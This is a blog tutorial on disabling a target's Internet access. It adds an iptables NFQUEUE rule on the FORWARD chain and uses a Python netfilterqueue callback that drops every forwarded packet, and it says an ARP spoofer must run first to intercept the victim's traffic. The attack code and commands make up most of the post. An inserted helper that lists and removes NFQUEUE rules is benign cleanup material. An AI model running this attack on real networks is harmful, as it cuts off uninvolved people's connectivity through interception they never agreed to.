Cut target Internet connection with Netfilterqueue

Maksym Postument
Sep 3, 2018 · 2 min read

Hello friends, we are going to disable Internet access for our target using Python.

To do this, we intercept the packets coming from the target and hold them in a queue. Whenever a request arrives it is placed in the queue, and it does not reach its destination while it sits there. We can then use Python to modify the queued packets and send the request on to its destination. The same process can be applied to responses.

To create the queue we are going to use iptables:

iptables -I FORWARD -j NFQUEUE --queue-num 0

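-I FORWARD: insert the rule at the top of the chain we want to modify. FORWARD is the chain that handles packets routed through this machine.

-j NFQUEUE: the target the rule jumps to. NFQUEUE (Netfilter queue) hands each matching packet to a userspace program.

--queue-num: the queue we are going to use. Can be any number.

Install the netfilterqueue Python package: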

pip install netfilterqueue

Import netfilterqueue:

import netfilterqueue

And create a NetfilterQueue object:

queue = netfilterqueue.NetfilterQueue()

To attach a callback function to the queue we are going to use the bind method:

QueueHandler.bind(queue_num, callback[, max_len[, mode[, range, [sock_len]]]])

Create and bind to the queue. queue_num must match the number in your iptables rule. callback is a function or method that takes one argument, a Packet object (see below). max_len sets the largest number of packets that can be in the queue; new packets are dropped if the size of the queue reaches this number. mode determines how much of the packet data is provided to your script. Use the constants above. range defines how many bytes of the packet you want to get. For example, if you only want the source and destination IPs of an IPv4 packet, range could be 20. sock_len sets the receive socket buffer size.

queue.bind(0, drop_packet)

0 — queue number from iptables command.

drop_packet — function which we are going to create.

Run the queue:

queue.run()

Now we need to implement the drop_packet function:

def drop_packet(packet):
    # Discard the queued packet instead of letting it continue
    packet.drop()

All packets received from the target will be dropped, and the target will lose its Internet connection.

Once you are done, you need to clean up iptables:

iptables --flush
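Note that iptables --flush removes every rule in the filter table, not only the NFQUEUE rule added above. The following is an added example, not part of the original post: it parses `iptables -S` output, lists each NFQUEUE rule, and builds the command that deletes just that rule. The function name and the sample rule listing are constructed for illustration.

```python
import shlex

# Constructed sample of `iptables -S` output; not taken from a real host.
SAMPLE_RULES = """\
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A FORWARD -j NFQUEUE --queue-num 0
-A OUTPUT -p udp -m udp --dport 53 -j NFQUEUE --queue-num 5 --queue-bypass
"""


def find_nfqueue_rules(listing):
    """Return one dict per rule in `iptables -S` output whose target is NFQUEUE."""
    found = []
    for line in listing.splitlines():
        tokens = shlex.split(line)
        # Only appended rules ("-A CHAIN ...") matter; "-P" lines are chain policies.
        if len(tokens) < 2 or tokens[0] != "-A" or "-j" not in tokens:
            continue
        target = tokens.index("-j") + 1
        if target >= len(tokens) or tokens[target] != "NFQUEUE":
            continue
        queue = "0"  # NFQUEUE uses queue 0 when no queue option is given
        for opt in ("--queue-num", "--queue-balance"):
            if opt in tokens:
                queue = tokens[tokens.index(opt) + 1]
        found.append({
            "chain": tokens[1],
            "queue": queue,
            # Without --queue-bypass, packets are dropped when no program
            # is bound to the queue (for example after the script exits).
            "fails_closed": "--queue-bypass" not in tokens,
            # The same rule spec with -D deletes only this rule.
            "delete_cmd": "iptables " + shlex.join(["-D"] + tokens[1:]),
        })
    return found


if __name__ == "__main__":
    # On a live host, pass in the output of `iptables -S` (requires root).
    for rule in find_nfqueue_rules(SAMPLE_RULES):
        state = "drops if nothing is bound" if rule["fails_closed"] else "bypass enabled"
        print(f'{rule["chain"]} queue {rule["queue"]}: {state}')
        print("  remove with:", rule["delete_cmd"])
```

A rule reported as failing closed keeps dropping forwarded traffic after the Python script stops, until the rule itself is deleted.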

For this script to work, arp_spoofer needs to be started first.

Check my blog — devopslife.xyz
